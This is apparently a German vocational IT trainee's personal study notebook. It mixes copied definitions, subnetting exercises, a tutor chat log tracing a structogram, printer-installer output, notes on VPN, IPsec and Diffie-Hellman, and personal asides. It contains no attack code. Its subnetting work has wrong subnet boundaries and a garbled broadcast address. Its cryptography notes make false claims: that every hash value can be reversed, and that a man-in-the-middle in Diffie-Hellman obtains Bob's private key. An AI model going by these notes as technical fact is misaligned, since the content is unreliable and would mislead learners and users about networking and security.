Präsentation der Arbeitsergebnissse ..

Ich gehe unterschiedlich an meine Aufgaben ran..

GRRRRRRRr Gefahren für ein Projekt GRRRRRRRRRRr fremde resourcen politik umwelteinschlüsse technsiche probelme personelle engpässe konflikte im team projektleiter nachträgliche änderungen mangelhafte planung schätzfehler

CSMA: “Der englische Begriff Carrier Sense Multiple Access/Collision Detection (CSMA/CD) (zu Deutsch etwa: „Mehrfachzugriff mit Trägerprüfung und Kollisionserkennung“) bezeichnet ein asynchrones Medienzugriffsverfahren (Protokoll), das den Zugriff verschiedener Stationen (beispielsweise Computer samt ihrer Netzwerkanschlüsse) auf ein gemeinsames Übertragungsmedium regelt.” .. ist ein Protokoll, um zu verhindern, dass es zu kollisionen kommt.

Ich habe google now auf meinem smartphone

STAPELSPEICHER (Stack): “In der Informatik bezeichnet ein Stapelspeicher oder Kellerspeicher (kurz Stapel oder Keller, häufig auch mit dem englischen Wort Stack bezeichnet) eine häufig eingesetzte dynamische Datenstruktur. Sie wird von den meisten Mikroprozessoren in der Hardware direkt unterstützt. .. Elemente können nur oben auf den Stapel gelegt und auch nur von dort wieder gelesen werden. Elemente werden übereinander gestapelt und in umgekehrter Reihenfolge vom Stapel genommen. Dies wird auch Last- In-First-Out-Prinzip (LIFO) genannt. ” bueno, gomida mui bien

Konfiguration: http://localhost:631

Error-log für Drucker: tail -f /var/log/cups/error_log

Der David hat ein Windows mit mehreren Arbeitsplätzen! q dir

Was mich auch interessieren würde: Wo werden .onion – Seiten gehostet?

Seltsam: “Während Tim hat erforscht die Schaffung eines einzelnen IRC-Kanal, wir werden eine gefälschte IRC-Server erschaffen…”

Grams, die Gollum-Variante von Google: “Optisch identisch mit der Google-Suche, liefert Grams Linklisten zu Waffen, Drogen, geklauten Kreditkarten, Auftragsmorden und anderen illegalen Gütern und Dienstleistungen.”

Partizip: “Ein Partizip (lat. participium, von particeps „teilhabend“; Plural: Partizipien) ist eine Wortform, die von einem Verb abgeleitet wird und dabei teilweise die Eigenschaften eines Verbs beibehält, teilweise Eigenschaften eines Adjektivs erwirbt. ”

Objektorientierte Programmierung: Polymorphie ist in PHP nicht möglich. Doch, aber sehr schwer .. (hab ein programm darüber mit antje geschrieben)

Zitat: “Affiliate-Systeme („angliedern“) sind internetgestützte Vertriebsarten, bei denen in der Regel ein kommerzieller Anbieter seine Vertriebspartner ( Affiliates) durch Provisionen vergütet. Der Produktanbieter stellt hierbei Werbemittel zur Verfügung, die der Affiliate auf seinen Webseiten verwendet oder über andere Kanäle wie Keyword-Advertising oder E-Mail-Marketing einsetzen kann. Ein solcher Affiliate-Link enthält einen speziellen Code, der den Affiliate eindeutig beim Händler identifiziert. .. Das Tracking mithilfe von Cookies ist die am meisten genutzte Methode beim Affiliate-Marketing, um einen User dem entsprechenden Affiliate zuordnen zu können.”

RAID und NAS, was ist NAS: “Neben dem Aspekt des besseren Schutzes vor einem Datenverlust bringt dies aber vor allem Geschwindigkeitsvorteile beim Zugriff auf Daten, weswegen RAID auch in erster Linie für schnelle Netzwerke interessant ist. Man spricht in diesem Zusammenhang auch gerne von NAS, also einem Network Attached Storage (Netzwerkspeicher), auf den alle Computer im angebundenen Netzwerk zugreifen können.”

Dritte Normalform (3NF): “Die Dritte Normalform ist das Ziel einer erfolgreichen Normalisierung in einem relationalen Datenbankmodell.

Sie verhindert einerseits Anomalien und Redundanzen in Datensätzen und andererseits bietet sie genügend Performance für SQL-Abfragen.” Ein hybrider Kernel ist ein Zusammenschluss von einem monolitischen und einem Mikrokernel!

NETZPLAN-WONDERLAND

1.2.2017 Prüfungsvorbereitung Wirtschaft

2.2.2017 Prüfungsvorbereitung Wirtschaft

6.2.2017 Englisch mit Antje Mews

Klingt Crass, aber ich erreiche mehr, wenn ich mich für morgen krank schreibe. Ich muss zu Basta, sehr früh sogar, um dort über das Job-Center zu reden... .. und dann gucken, wie das Jobcenter am besten auf meine Ausbildungs-Beichte vorbereitet werden kann.

Erhöhter Grundwert: Wenn es heißt: “Nachdem der Preis um 10% erhöht wurde, kostet ein Laptop jetzt 451 €.

Wie viel hat er vor der Preiserhöhung gekostet?” ist 100 = 451 Geteilt durch 451, dann mal 100 und man hat den Ursprungspreis: 410 Euro!

Verminderter Grundwert: “Nach einer Preissenkung von 20% kostet eine Digitalkamera nur noch 180 €.

Wie teuer war sie vorher?”

80% = 180 Euro. Dann geteilt durch achtzig, damit man ein Prozent hat und dann mal hundert, und man bekommt den Ursprungspreis: 225 Euro.

Ich saß am Rande und sah den beiden in Menschenfrauen verwandelten Schlangen genüßlich zu. Ich fühlte mich als vom Alltag getriebene Person ganz erleichtert, als ich bedachte: “Eigentlich können die Menschen nicht verleugnen, trotz aller Demokratie und Gutmenschentum, dass sie wie eine domestizierte Herde sind, welche die ganze Zeit durch die Gegend getrieben wird! Hach, wie schön ist es, 'Wildtiere' zu sehen!!”

7.2.2017: Android mit Linux verbinden. “Aus technischen Gründen kann man den internen Speicher eines Android 3.x oder 4.x Gerätes nicht mehr als USB-Massenspeicher auf einem Computer einbinden. Stattdessen werden die Daten über ein MTP (Media Transfer Protocol) getauftes Protokoll übertragen. Windows-User werden keinen großen Unterschied spüren, da Windows ab Vista das Protokoll von Haus aus im Explorer unterstützt. Für Linux muss man jedoch noch im Terminal zaubern.”

GMTP heißt ein Programm, das helfen könnte, Kontakt mit Mobiltelefinen herzustellen.

“Wenn Sie keine Netzmaske eingeben, wird die Standardnetzmaske für die Klasse des Netzwerks angenommen.” Es gibt Standard-Subnetzmasken für Netzwerke?

(18:07:22) phantaski: es gibt aber menschen, die sagen, elf könnte das menschliche Verhalten beeinflussen (18:08:44) mate: ja, aber ich weiß diese leute haben keine ahnung. (18:09:36) mate: physikalisch gesehen ist das nicht realistisch, da haben funkwellen höherer frequenzen mehr wirkung (18:10:15) phantaski: du meinst, wenn die wellenimpedanz kurz genug ist, dass der körper sie empfangen kann z.B. Gigahertz (18:10:16) mate: wie gesagt, um ELF überhaupt messen zu können brauchst du schon viele hundert meter antenne (18:11:18) mate: dagegen bei UKW (100MHz) reichen ~75cm für eine einfache lambda-viertel antenne (18:12:14) phantaski: 75 cm? ich bin 188 cm (18:12:25) phantaski: ich könnte ukw empfangen (18:12:45) mate: bei wlan (2400MHz) ist eine lambdaviertel-antenne 3,1 cm lang (18:13:42) mate: öhm, also wenn du ein implantat mit 75cm metalldraht hast dann schon (18:14:32) mate: der körper an sich ist kein so guter elektrischer leiter... da müsste man schon mit enormer feldstärke draufballern damit es warm wird (18:15:14) mate: siehe mikrowelle, die ballert mit 2,4GHz wie WLAN - aber mit 1000Watt damit das essen warm wird (18:16:42) mate: und da die wlan-antennen rundstrahler sind verteilt sich die energie, also 1m weg von der antenne hast du vielleicht noch 10mW (18:16:57) phantaski: wenn man ständig wlan ausgesetzt ist, wird man qwasi gegrillt, auch bei milliwatt, kleinvieh macht auch mist, oder? (18:17:36) mate: neee, das wlan sendet ja auch nicht dauerstrich, nur wenn daten zu übertragen sind (18:19:03) mate: zu den physiologischen effekten von wlan und mobilfunk gibt es immer noch keine belastbaren studien

Interface: ein Bauteil, mit dem Daten von einem Gerät in ein anderes geleitet werden können.

Quatitativer Angebotsvergleich, um Bezugspreis zu ermitteln:

Es wurde von oben nach unten gerechnet, weil der Listeneinkaufspreis gegeben war:

Angebot Kalkulation

Listeneinkaufspreis 84000,00 84000,00 Lieferrabatt 5 % -4200 Zieleinkaufspreis 79800 Lieferskonto 2 % -1596 Bareinkaufspreis 78204 Bezugskosten +100 EUR +100,00 Bezugspreis 78304,00 Euro

Bernhard kann man über jabber erreichen

Freier Puffer: Die Formel zur Berechnung des freien Puffers FP lautet: FP = Niedrigster FAZ der Nachfolger – FEZ

Gesamtpuffer: Die Formel zur Berechnung des Gesamtpuffers GP lautet: GP = SEZ - FEZ DAT = Das DigitalAudioTape ist dieses “Superding”, von dem mir Peter erzählt hatte: “Mit einer Abtastrate von bis zu 96 kHz und einer Auflösung von maximal 24 Bit ist das Klangpotenzial höher als das der Audio-CD, dies war jedoch nicht in allen Geräten verfügbar. Am meisten verwendet wurde das zur Audio-CD äquivalente Format mit 44,1 kHz Abtastrate und 16 Bit.”

Theoretisch könnte ich Tonaufnahmen, die ich direkt in den Computer rein spreche, sofort in einer hohen Qualität (96 kHz) speichernund in 24 Bit. Oder gibt es Flaschenhälse, wie die Güte des Mikrophons?

Android-tools-adb gmtp = Connector für android?

Es klappert die Mühle am rauschenden Back, klapp klapp, dann kam ein UFO und brannte sie ab, zap zap

Minemasewut, alles ist kaputt

“Da MITS nicht die Rechte an Altair BASIC besaß und dieses nun unter dem Label von Micro-Soft weiter vermarktet wurde, gab es später einen Rechtsstreit zwischen der Pertec Computer Corporation und Microsoft.”

Die IP: 192. 168. 0. 0 mit einer 27er-Subnetzmask: 255. 255. 255. 224

Erstes Subnetz: 192. 168. 0. 0 BC: 192. 168. 0. 31

Zweites Subnetz: 192. 168. 0. 31 BC: 192. 168. 0. 63

Acht Netze sollen möglich sein.

Der Broadcast ist auch nach dem achten Netz: 192. 168. 0. 255 Ist das der endgültige BC?

Wenn ja, wie kann ich die Anzahl der Netze bei einer Range über 255 kontrollieren ??

Es gibt eine öffentliche ipv4-Adresse: 31. 120. 93. 67 00011111 01111000 01011101 01000011

255. 255. 254. 0 Dazu eine 23er-Subnetmask: 11111111 11111111 11111110 00000000

31. 120. 92. 0 Netzadresse: 00011111 01111000 01011100 00000000

Im Hostanteil: 2 hoch 9 = Es sind 512 Hosts möglich.

Erstes Subnetz: 31. 120. 92. 0 31. 120. 93. 255 Zweites Subnetz: 31. 120. 94. 0 31. 120. 95. 255

Drittes.. 31. 120. 96. 0 31. 120. 97. 255

Es sollen 128 Subnetze möglich sein. Wieso? 92+128 = 220.

Das ist der letzte allgemeingültige Broadcast: 31. 120. 255. 255

Aber das müsste doch eher der BC einer 16er-Mask sein, weil hier der Netzanteil nur 16 bit groß ist.. .

Dann ist da noch eine Aufgabe, die ich nicht verstehe:

99. 88. 77. 66 01100011 01011000 01001101 01000010 diese IP hat eine 22er-Subnetmask: 255. 255. 252. 0 11111111 11111111 11111100 00000000

Die Netzadresse ist: 99. 88. 76. 0 01100011 01011000 01001100 00000000

Erstes Subnetz: 99. 88. 76. 0 BC: 99. 88. 79. 255

Zweites Subnetz 99. 88. 80. 0 BC: 99. 88. 83. 255.255.0.0

Es sollen 64 Zustände möglich sein.. .

Ist der letztgültige Broadcast bei 99. 88. 255. 255, obwohl es hier eine 22er – Subnetmask gibt ??

Es gibt PHP-Frameworks: (Laravel, Symfony, Zend, etc.)

Framework: “Ein Framework (englisch für Rahmenstruktur) ist ein Programmiergerüst, das in der Softwaretechnik, insbesondere im Rahmen der objektorientierten Softwareentwicklung sowie bei komponentenbasierten Entwicklungsansätzen, verwendet wird. Im allgemeineren Sinne bezeichnet man mit Framework auch einen Ordnungsrahmen. .. Der Programmierer registriert konkrete Implementierungen, die dann durch das Framework gesteuert und benutzt werden, statt – wie bei einer Klassenbibliothek – lediglich Klassen und Funktionen zu benutzen.”

Morgen werde ich weiter Bewerbungen schreiben und spielefirmen anschreiben, die ich von vorherigen meiner bewerbungen schon kannte. daedelic studios und an diese data-analytics-firma in tegel 10.2.2017 Selbstlernen: Struktogramme

Schreibtischtest: “Der Schreibtischtest ist ein Verfahren, das im Bereich der Softwareentwicklung verwendet wird, um Algorithmen oder Routinen auf Richtigkeit zu prüfen. Der Schreibtischtest wird nicht mit Hilfe eines Rechners durchgeführt sondern vielmehr im Kopf des Entwicklers. Dazu werden für einen deterministischen und terminierenden Programmablauf eine Eingabe- und eine mögliche Ausgabemenge festgelegt.”

Deterministisch: “Der Begriff „deterministisch“ wird in der Informatik vor allem im Zusammenhang mit Algorithmen verwendet. Ein Algorithmus, soviel zur Erinnerung, ist eine Schritt-für-Schritt-Anleitung zur Lösung eines Problems, z.B. ein Kochrezept oder ein Computerprogramm. Ein „deterministischer Algorithmus“ ist ein Algorithmus, der vorhersagbar abläuft. Damit ist gemeint, dass er bei gleichen Ausgangsbedingungen – oder, im Falle des Programms, bei gleichen Eingabewerten – immer dieselben Schritte durchläuft und dasselbe Ergebnis liefert. Ersteres ist dabei ein wichtiger Bestandteil der Definition: Ein Algorithmus könnte ja auch in zwei Durchläufen bei derselben Eingabe dasselbe Ergebnis liefern, aber unterschiedliche Schritte durchlaufen. In diesem Fall wäre er nicht deterministisch. Nur, wenn er sich bei gleichen Eingaben immer gleich verhält, wird er deterministisch genannt.

.. Gibt es keine Möglichkeit, vom Rezept abzuweichen, ist unser Rezept determinsitsich. Nur eine Möglichkeit der Fortsetzung.”

Determiniertheit: “Wenn er determiniert ist, können wir die Schritte vertauschen. Der Weg ist egal, das Ergebnis muss immer gleich sein”

Terminierend: “Einen Algorithmus nennt man terminierend, wenn er bei jeder Anwendung nach endlich vielen Verarbeitungsschritten anhält und ein Resultat liefert. .. Der Algorithmus liefert ein Ergebnis und kommt zum Ende, nach endlich vielen Schritten.”

Also für beide Programmabläufe wird eine Eingabe- und eine mögliche Ausgabemenge festgelegt, bei der Prüfung der Richtigkeit.

Zählerbescheuerte Schleife: “Die Anzahl der Schleifendurchläufe wird durch eine Zählvariable festgelegt. Im Schleifenkopf werden der Startwert der Zählvariablen, der Endwert und die Veränderung der Zählvariablen nach jedem Schleifendurchlauf angegeben. ” Aus weia, wie macht man das in einem Struktogramm: “Es ist zu beachten, dass die Bezeichnungen der Variablen in allen Anweisungen korrekt verwendet werden müssen. ” ??

Unterschied zwischen kopfgesteuerter und zählergesteuerter Schleife: “”

In Java und vielen anderen Programmiersprachen müssen Variablen vor der Verwendung deklariert werden und ihr Datentyp benannt werden.

Du bist integer, du bist string, du bist mensch, du bist repto!!

Initialisierung: Variable mit einem Anfangswert besetzen.

nur wer die manchmal verrücktte neugier eines kindes hat wird die unfähigkeit der erwachsenen überwinden, ihre systeme und normen zu überspringen ist eine frage des unkontrollierten intuitiven wahnsinns. genies sind niemals systemrelevant!

Iterierung: “(Mathematik, EDV) wiederholen, eine Iteration (2) vornehmen”

Iteriert = hoch gezählt

erstmal checken ob du überhaupt noch einmal in die schleife tauchen sollst

inkrementiert = mit wert belegen?

Iteriert = hoch gezählt

11.2.2017 Hackers Lounge diff standardwerkzeug für programmierer aus dem genderten programm und dem ursprungspogramm vergleichen. diff -u dateiname1 dateiname2 größerzeichen ziel dateinamen endung x.diff oder x.patch dann mit den mc dorthin + f4-taste drücken, um editor zu starten. u firmware für den neuen wlan-kernel zu installieren: debian wcm4365 firmware gutes web-vektor-prgramm: vrml recovery mode muss man austauschen, um ein alternatives system zu installieren es muss genau zu dem telefon passen, dass man cracken will .. problem: Garantie verfaellt niemals mit handy und laptop gleichzeitig im Jabber sein und Verschüsselung aktivieren, sonst gibt es ein Kuddelmuddel !!! arancha für aranja auch wirklich sagen Wie wird korrekt ein Struktogramm gelesen? Martn erklärte es mir:

(15:30:52) mate: also nochmal zeigefinger in die allererste zeile, programmstart. was passiert?

(15:31:54) phantaski: n:= getlanes() (15:32:32) mate: getlanes() ist die funktion die die anzahl der fahrspuren als rückgabewert liefert (15:32:42) mate: was macht dein programm damit? (15:33:55) phantaski: es setzt getlanes als variable (15:34:24) phantaski: bzw die werte, die mit getlanes rein gehen (15:34:36) mate: nein, getlanes() bleibt eine funktion, du hast sie gerade aufgerufen und sie gibt dir eine zahl (15:34:49) mate: was machst du mit dieser zahl (15:35:15) phantaski: keine ahnung (15:35:21) mate: n := ???? (15:35:51) mate: das was auf der rechten seite berechnet wurde wird in die variable auf der linken seite geschrieben (15:36:12) mate: also, was machst du? (15:36:25) phantaski: den wert weiter reichen (15:37:00) mate: genau gesagt: du speicherst die zahl in der variable n (15:37:10) phantaski: ja (15:37:16) mate: n ist jetzt also die zahl der fahrspuren (15:37:30) phantaski: ich weiß was eine vaRIABLE MACHT .. (15:37:39) phantaski: ja (15:37:40) mate: der zeigefinger wandert auf die zweite zeile (15:37:52) mate: was passiert dort? (15:38:40) phantaski: da wird der variable durchschnitt der wert null übergeben (15:38:50) mate: ja (15:39:24) phantaski: dann wird der variable z der wert null übergeben und dann der variable i der wert null übergeben (15:39:24) mate: der finger wandert weiter (du arbeitest jetzt mal ganz schematisch wie ein prozessor das programm ab (15:40:31) mate: jut, was passiert jetzt? (15:40:54) phantaski: jetzt tritt der zeiger in die schleife ein .. (15:41:42) phantaski: i verbleibt bei null, weil nicht weiter übergeben wurde.. (15:41:44) mate: jo, also ich sag jetzt mal die funktion getlanes() hat zwei zurück gegeben am anfang, damit wir eine konkrete zahl haben (Kongreeder Anruf) (15:42:43) mate: ist die bedingung um in die schleife einzutreten erfüllt? (15:42:54) phantaski: ja (15:43:08) mate: ok, und jetzt? (15:43:30) phantaski: wird i um eins hochgezählt, aber wieso? (15:43:52) mate: richtig, das passiert halt, wieso siehst du später (15:44:04) mate: nächste anweisung? (15:46:08) phantaski: ääh, .. die variable i, die um eins erhöht wurde, wird mit der getspeed-funktion verknüpft und in die variable s gepackt (15:47:14) mate: i ist gerade gleich 1, also wird getspeed(1) aufgerufen(!), und gibt als rückgabewert(!) 50 (fünfzig) zurück (15:47:57) mate: und ja, der rückgabewert wird in der variable "s" abgelegt. (15:50:12) phantaski: dann wird, weil i gleich 1 ist, getvehicles() aufgerufen. Fall es größer als Null ist, gehe zu durchschnitt:=durchschnitt+s, sonst zu durchschnitt:=durchschnitt/n? (15:50:42) mate: nee, getvehicles(1) wird aufgerufen (15:51:14) mate: ich bin die funktion getvehicles(x) und gebe dir 5 (fünf) zurück (15:51:43) phantaski: dann gehe ich zu durchschnitt:= durchschnitt+s, (15:51:55) mate: richtig (15:52:38) mate: welchen wert hat durchschnitt jetzt? (15:52:43) phantaski: ich addiere dabei die 50 auf die 0 (15:52:49) mate: genau (15:52:56) phantaski: durchschnitt hat jetzt 50 (15:53:31) mate: jetzt wird z auf eins hochgezählt (15:53:36) mate: watt nu? (15:54:37) phantaski: es kann ja nur eine Richtung geben, nämlich ja, weil mit i:=i+1 schon i=1 ist .. (15:54:54) mate: also ist i=1 wahr (15:54:59) phantaski: ja (15:55:25) phantaski: was mich wundert, wieso i nicht wahr sein soll, weil sonst hätte man in die schleife nicht gekommt .. (15:55:37) mate: mooooment (15:56:02) mate: bei dieser wenn-dann abfrage steht "i=1 ?" (15:56:27) mate: du setzt den aktuellen wert von i ein und kommst auf "1=1 ?" diese aussage ist wahr (15:56:38) mate: also nimmst du den J-zweig (15:56:59) phantaski: geht ja auch nicht anders (15:57:29) mate: was passiert? (15:58:31) phantaski: die variable i, die auf eins gesetzt ist, ist gleich 1 und damit wahr. Allerdings ist es mir ein Rätsel, warum sie falsch sein sollte (15:59:34) mate: das ergebnis des vergleichs ist jetzt gerade wahr, wenn i=2 wäre, dann würde der andere zweig genommen (15:59:57) phantaski: wird die schleife mehrhmals durchlaufen? (16:01:39) mate: kann sein, wenn n größer als eins ist... (16:02:08) phantaski: n ist doch 2, 2 spuren, hast du doch selber gesagt .. (16:02:18) mate: egal, weiter im text, i=1 ist jetzt gerade wahr und du nimmst den J-zweig (16:02:26) mate: ja, habe ich. (16:02:30) mate: weiter im text (16:03:07) mate: was machst du? (16:04:20) mate: (du bist gerade der prozessort (16:05:04) phantaski: die variable minimum mit s belegen, was 50 ist (16:05:09) mate: nein, "minimum := s", also der aktuelle inhalt von "s" wird nach minimum kopiert (16:05:20) mate: nja (16:05:36) phantaski: richtig? (16:06:09) mate: minimum enthält jetzt auch die 50, nur das wording was nicht optimal (16:06:23) phantaski: wording? (16:07:05) mate: deine beschreibung von was passiert. der inhalt von s (50) wird in die variable minimum geschrieben wäre exakt (16:07:34) phantaski: ok (16:08:04) mate: jetzt endet der schleifenbalken links, also zurück auf "solange" (16:08:10) mate: wie gehts weiter (16:08:56) phantaski: nochmal eins auf i zählen ?? (16:09:00) mate: moment, “solange” hat eine bedingung, ist die jetzt erfüllt? (16:09:32) mate: erstmal checken ob du überhaupt noch einmal in die schleife tauchen sollst (16:09:34) phantaski: nein, n ist immer noch größer als i, nämlich n = 2 und i = 1 (16:10:11) mate: nochmal genau gucken, damit ist i 0 = false (16:19:45) mate: korrekt (16:20:39) mate: wie liest sich das flussdiagramm weiter? (16:20:45) phantaski: dann ist die schleife 2<2, oder? (16:21:03) mate: jo, was passiert? (16:21:22) phantaski: 2<2 = false, zeiger verläßt die schleife (16:21:28) mate: korrekt (16:21:33) phantaski: ich dachte, das ist ein struktogramm (16:21:48) mate: ja, meinetwegen struktogramm (16:22:06) mate: ja, flussdiagramme haben ja mehr pfeile (16:22:31) phantaski: dann wird in die variable durchschnitt die variable durchschnitt (50) durch n (n=2) geteilt (16:22:31) mate: wir sind jetzt also bei marke (4) (16:22:46) mate: perfekt (16:23:01) phantaski: durchschnitt ist jetzt mit 25 belegt (16:23:52) phantaski: die nächste Anweisung setzt die Variable Stauwarnung auf 0. (16:24:07) mate: ja (16:24:36) phantaski: dann wird die variable durchschnitt gefragt, ob sie kleiner als 70 ist .. (16:24:47) mate: jau (16:25:06) phantaski: das ist sie, die variable stauwarnung wird mit 1 belegt (16:25:13) mate: jo (16:27:06) phantaski: dann ist z größer als Null (wurde mit eins belegt), aber minimum ist immer noch bei 50. Also ist minimum falsch, aber z wahr .. (16:27:50) mate: durch die und-verknüpfung ist damit das gesamtergebnis falsch (16:28:13) phantaski: also wird eine Stauwarnung ausgegeben (16:29:03) mate: ich bin die funktion ausgabe(flagge), du gibst mir also eine eins und ich mache die stauwarnzeichen einen kilometer vor der messstelle an (16:29:34) mate: ausgabe(flagge) hat keinen rückgabewert für dich ich returniere einfach so zu dir (16:30:42) mate: ist dir was mit der variable durchschnitt aufgefallen? (16:31:19) phantaski: sie wirrd durch 2 geteilt und wird damit kleiner als minimum (16:32:00) mate: nee, der fehler liegt daran daß eine spur ja leer war "getvehicles(2)" ergab null. (16:32:43) mate: dadurch wurde die 60 (der letzte messwert von vorher weitergeschrieben) garnicht verwendet. (16:33:09) mate: also es wurde nur eine geschwindigkeit aufaddiert, aber dann doch durch zwei geteilt (16:33:18) mate: wie wäre es korrekt? (16:33:24) phantaski: keine ahnung (16:34:53) phantaski: irgendwas mit getvehickes(i) > 0 ist falsch, oder? (16:35:58) mate: nö, aber in diesem durchgerechneten beispiel hatten wir zwei spuren (n=2), aber nur eine war benutzt. wie müsstest du die sache mit durchschnitt formulieren damit der durchschnitt stimmt? (16:37:34) phantaski: durchschnitt:=durchschnitt + n ?? ichhab keine ahnung (16:37:52) phantaski: durchschnitt:= durchschnitt + n ?? ichhab keine ahnung (16:37:59) mate: durchschnitt := 50+2 ? (16:38:21) mate: welchen zweck hat die variable z eigentlich? (16:38:40) phantaski: gar keinen (16:38:59) mate: doch, die wird ja unten noch einmal benutzt (16:39:40) mate: also anders gesagt, was zählt z? (16:39:57) mate: wann wird z inkrementiert? (16:40:11) phantaski: in der mitte von der schleife (16:40:16) mate: und wann wird z nicht inkremerntiert? (16:40:33) phantaski: am anfang und am ende (16:41:35) mate: hmmm, schau mal genau, z wird in der schleife erhöht. unter welcher bedingung wird z bei einem schleifendurchlauf nicht hochgezählt? (16:42:10) phantaski: wenn gar keine fahrzeuge fahren (16:42:14) mate: genau! (16:42:33) mate: welchen wert hatte z denn nach dem abarbeiten der schleife? (16:42:47) mate: (also dem kompletten abarbeiten) (16:42:54) phantaski: 1 (16:43:06) mate: genau (16:43:22) phantaski: nein, warte 2, wir sind ja zweimal durch gegangen (16:43:44) phantaski: aber okay, beim 2. mal sind wir hintenrum raus (16:43:50) mate: ja (16:44:02) mate: das ist es! (16:44:31) mate: wenn du in die zeile über dem inkrement schaust, jedes mal wenn auf durchschnitt addiert wird, dann wird auch z erhöht. (16:45:13) mate: also, wie sollte die zeile nach dem schleifenkörper lauten? (16:45:52) phantaski: durchschnitt:=durchschnitt/z ?????????? (16:45:58) mate: BINGO! (16:46:04) mate: du hast den fehler gefunden (16:46:54) mate: bei dem beispiellauf wäre trotzdem stauwarnung ausgelöst worden, aber damit wäre der durchschnittswert korrekt. (16:47:03) phantaski: durchschnitt:= durchschnitt/z stand unter einen von 5 lösungsvorschlägen auf dem nächsten blatt, deshalb hatte ich geraten, dass das richtig ist, als du nach der zeile nach dem schleifenkörper fragtest (16:48:39) mate: naja, ganz korrekt ist das programm zwar immer noch nicht, aber die berechneten werte sind schon mal besser. (16:49:06) phantaski: puh! programmierung ist anstrengend! (16:49:13) mate: welches problem steckt noch in dem programmcode? (16:52:16) phantaski: keine ahnung (16:52:40) mate: welchen wert haben denn durchschnitt und z wenn alle fahrspuren leer sind? (16:52:53) phantaski: 0 (16:53:29) mate: z=0 und durchschnitt=0 ist richtig (16:54:30) mate: das problem liegt in der division, weil die division darf nicht versucht werden wenn z=0 ist. dann würde das programm an der stelle crashen mit einer fehlermeldung (16:55:10) mate: da müsste also noch ein if/then davor was die division überspringt wenn z=0 ist (16:55:20) phantaski: moment, das war nicht frage in der aufgabenstellung (16:55:32) mate: ja, das kann sein ^^ (16:55:52) mate: aber mir als programmiererfahrener sticht das ins auge INSTALLATION NOTES ------NOTE: Disable the CD Sources in your apt sources.list or the install will fail and hang.

Please read the installation notes. Press to continue or 'q' to quit:

--

MISSING DEPENDENCIES ------Following dependencies are not installed. HPLIP will not work if all REQUIRED dependencies are not installed and some of the HPLIP features will not work if OPTIONAL dependencies are not installed. Package-Name Component Required/Optional pyqt5-dbus gui_qt5 REQUIRED libcrypto network REQUIRED libnetsnmp-devel network REQUIRED sane-devel scan REQUIRED pyqt4-dbus gui_qt4 REQUIRED python-devel base REQUIRED cups-devel base REQUIRED reportlab fax OPTIONAL pyqt5 gui_qt5 REQUIRED pyqt4 gui_qt4 REQUIRED libusb base REQUIRED libtool base REQUIRED cups-image base REQUIRED libjpeg base REQUIRED dbus fax REQUIRED avahi-utils network OPTIONAL Do you want to install these missing dependencies (y=yes*, n=no, q=quit) ? Drucker auf default setzen, dann:

(18:01:32) mate: also drucker angeschlossen, dann ifconfig eth1 192.0.0.1 (18:01:38) mate: ping 192.0.0.192 erst dann kann man ihn anpingen, meine Erfahrung.

Achtung: Mein samsung clp 300-Drucker kann defekt sein, weil es geplante pbsoleszenz gibt. Äußerlich, und ich hatte diesen Kartuschenebreich mit der Walze raus geholt, sieht er noch völlig in Ordnung aus !! Womöglich gibt er den geist auf, wenn man die vierten Kartuschen rein legen wll. Philip, hatte der Drucker zufällignicht mehr funktioniert, nachdem du zum vierten Mal neue Farbkartuschen rein leben wolltest?

Zur kommenden Zwischenprüfung, die ich nach schreiben muss: Wenn eine Aufgabe in mehrere Parts gestückelt ist, immer noch mal die ganze Aufgabe durch blicken, weil bei der ZP 2012, die ich probeweise durchging, hatte ich in Aufgabe 3.2 schon wieder die Kameras der anderen Autobanspur vergessen !!!!!!

13.2.2017 Verschlüsselung mit Mathias Rüdiger

öffentlicher und privater Schlüssel ausgetauscht, bevor ich losgefahren bin und fertig jetzt bin ich schon in Essen, könne nnicht mehr sicher kommunizieren Der Authentifizierungsheader glüht nicht.

Themen:

Symetrische und asymethische Verschlüsselung.

Punkt zu punkt, Punkt zu mehrpunkt preshared keys jeder hashwert kann zurückgerechnet werden man-in-the-middle

Triple-A-Systeme (oder AAA-Systeme, kurz AAA) werden in großem Umfang bei kabelgebundenen und mobilen Netzwerk-Betreibern sowie Internetdienstanbietern eingesetzt. Die drei A stehen dabei für Authentifizierung (engl. authentication), Autorisierung (engl. authorization) und Abrechnung (engl. accounting) des Netzwerkzugangs von Kunden (Endkunden).

Verschlüsselungsarten: WLAN: WEP, WPA, WPS (OSI-Schicht 1), Komplettes Paket, bis zum letzten Bit verschlüsselt, neuer header wird dran gehangen, Protokoll im Protokoll ..

Internet: HTTPS, SSH, SSL, PGP, TLS (OSI 7), Nur die Daten werden verschlüsselt.

Netzwerkprotokoll: OpenVPN, Ipsec (OSI 3) Wahlweise ganzer Datenverkehr oder nur ein Protokoll verschlüsselt ..

RADIUS.

Difie-hellmann-Schlüsselaustausch.

Ipsec: Protokollsuite

TCP/IP Protokollfamilie außer ethernet

VPN = Virtual Private Network (deutsch „virtuelles privates Netzwerk”). Reines softwareprodukt.

Punkt - zu – punkt – geschichte. verschiedene modi end zu end = host zu host so gut wie nicht genutzt: end-to-side end zu site = host zu vpn-server site to site = server zu server setzt auf ipsec auf.

Forwarding-modus: alles kann man über VPN ins gleiche netzwerk hängen, broadcast und alles, ein gemeinsames netz ipsec: Unterschied transportmodus und tunnelmodus esp (Encapsulating Security Payload) im transportmodus ipsec: Sammelsurium an Protokollen.

Beide Seiten sollen Zertifikate nutzen.

SAD(security association database) = mehrfach und begrenzte Gültigkeit heute werden laufend die Schlüssel gewechselt asymetrisch = seinen öffentlichen für sich hinterlegen

Manuelle Schlüsselverwaltung

Internet-Key-Exchange-Protokoll(IKEv1) = Diffie Hellmann

Diffie-Helmann Modulo dann macht ein Client sich nen provaten wert und rechnet modulo aus. Der andere auch, in blau, macht wieder ein modulo. Dann wird orange-grün ausgetauscht unter beiden, vader lauscht mit. Vater hat den grünen und orangen. Aber dann nimmt alice den grünen und gleicht den mit orange ab (erklärt unter diffie-gellmann key exchange) priovte zahl blau, öffentliches Gelb wenn beide modulo rechnen, kommt bei beiden der gleiche wert raus. Obwohl der eine den Schlüssel von drübe nicht kennt, kommt die selbe adresse raus. symetrischer schlüsselaustausch aber nur, wenn er lauscht. Problem: wenn bob vorgegaukelt wird, dass er alice sieht, aber ist in wirklichkeit Darth ist, dann kriegt darth den private key von bob!

